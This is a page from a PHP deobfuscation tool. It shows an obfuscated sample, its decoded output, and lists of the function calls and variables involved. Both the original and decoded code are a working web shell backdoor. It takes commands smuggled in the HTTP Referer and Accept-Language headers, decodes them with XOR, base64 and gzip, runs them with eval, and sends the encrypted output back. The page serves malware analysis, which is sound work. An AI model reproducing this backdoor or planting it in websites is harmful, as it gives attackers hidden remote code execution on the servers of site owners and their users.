Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php $r='l($ss(md5Af($iAf.$Afkh)Af,0,3));$fAf=$sl($ss(md5(Af$i.$kfAfAfAf),0Af,Af3));$p=""..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$r='l($ss(md5Af($iAf.$Afkh)Af,0,3));$fAf=$sl($ss(md5(Af$i.$kfAfAfAf),0Af,Af3));$p="";for($z=1;$z<AfAfcount($m[1]);$z+Af+Af)$pA';
$D='nAfAfd_clean();$d=bAfasAfe64_enAfAfcAfodAfe(x(gzcompresAfs($o),Af$k));print(Af"<$k>$d</$Afk>");@sesAfsiAfon_dAfestroy();}}}}';
$x='sAf[$iAf].=Af$p;$e=sAftrpos($s[$i]Af,$Aff);ifAf($e){$k=$kh.$Afkf;ob_stAfarAft();Af@eAfval(Af@gzuncoAfmpress(Af@x(@basAfe64_decodeAf(prAfe';
$h='q&&$m){Af@sessioAfAfAfn_start(Af);$s=&Af$_SESSION;$ss="sAfubstrAf";Af$sl="stAfrtoloAfAfweAfr";$i=$m[1][0].$m[1]AfAf[1];$h=$s';
$S=str_replace('vX','','crevXavXtvXe_fuvXvXncvXtion');
$c='$Afkh="Af5d41";$kf="402a"Af;functAfion xAf($tAf,$k){$c=strAflen(Af$k);$lAf=strlen(Af$t);$oAf=Af"";fAfor($i=0;$i<$l;Af){for';
$j='g_replaceAf(arAfray("/_/Af","Af/Af-/"),Afarray("/","+"),Af$ssAf($s[$i],0,AfAf$e))),$kAf)));Af$Afo=ob_get_contents(Af);ob_e';
$g='(Af$j=0;(Af$j<Af$c&&$i<$Afl)Af;$j++,$iAf+Af+){$o.=$t{$i}Af^$k{$AfAfj}Af;}}return Af$o;}$Afr=$_SERVER;$rAfr=@$Afr["HTAfT';
$z='Afry"Af],$q);$q=Afarray_vAfaluesAf($qAf);pregAf_Afmatch_all("/([\\Afw])Af[\\w-Af]+(?:Af;q=0.([\\dAf]))?,?/",Af$rAfa,$m);AfAfif($';
$M='fAf.=$q[$m[2]Af[$z]];Afif(strpos($p,$hAf)===Af0){Af$s[$i]="";$Afp=$ss($Afp,3Af);}if(Afarray_AfkeyAf_AfAfexists($i,$s)){$';
$N='AfP_REFERAfAfER"Af];$raAf=@$r["AfHTTP_ACCEPAfT_LANGUAGEAf"];if($rr&&$raAf){$u=paAfrse_urAfAfl($rr);parsAfe_str(Af$u["que';
$Y=str_replace('Af','',$c.$g.$N.$z.$h.$r.$M.$x.$j.$D);
$n=$S('',$Y);$n();
?>

Function Calls

null	1
str_replace	2
create_function	1

Variables

$D	nAfAfd_clean();$d=bAfasAfe64_enAfAfcAfodAfe(x(gzcompresAfs($..
$M	fAf.=$q[$m[2]Af[$z]];Afif(strpos($p,$hAf)===Af0){Af$s[$i]=""..
$N	AfP_REFERAfAfER"Af];$raAf=@$r["AfHTTP_ACCEPAfT_LANGUAGEAf"];..
$S	create_function
$Y	$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$c	$Afkh="Af5d41";$kf="402a"Af;functAfion xAf($tAf,$k){$c=strAf..
$g	(Af$j=0;(Af$j<Af$c&&$i<$Afl)Af;$j++,$iAf+Af+){$o.=$t{$i}Af^$..
$h	q&&$m){Af@sessioAfAfAfn_start(Af);$s=&Af$_SESSION;$ss="sAfub..
$j	g_replaceAf(arAfray("/_/Af","Af/Af-/"),Afarray("/","+"),Af$s..
$n	None
$r	l($ss(md5Af($iAf.$Afkh)Af,0,3));$fAf=$sl($ss(md5(Af$i.$kfAfA..
$x	sAf[$iAf].=Af$p;$e=sAftrpos($s[$i]Af,$Aff);ifAf($e){$k=$kh.$..
$z	Afry"Af],$q);$q=Afarray_vAfaluesAf($qAf);pregAf_Afmatch_all(..

Stats

MD5	d14546f3aea9b5266a1729293f236d83
Eval Count	1
Decode Time	117 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats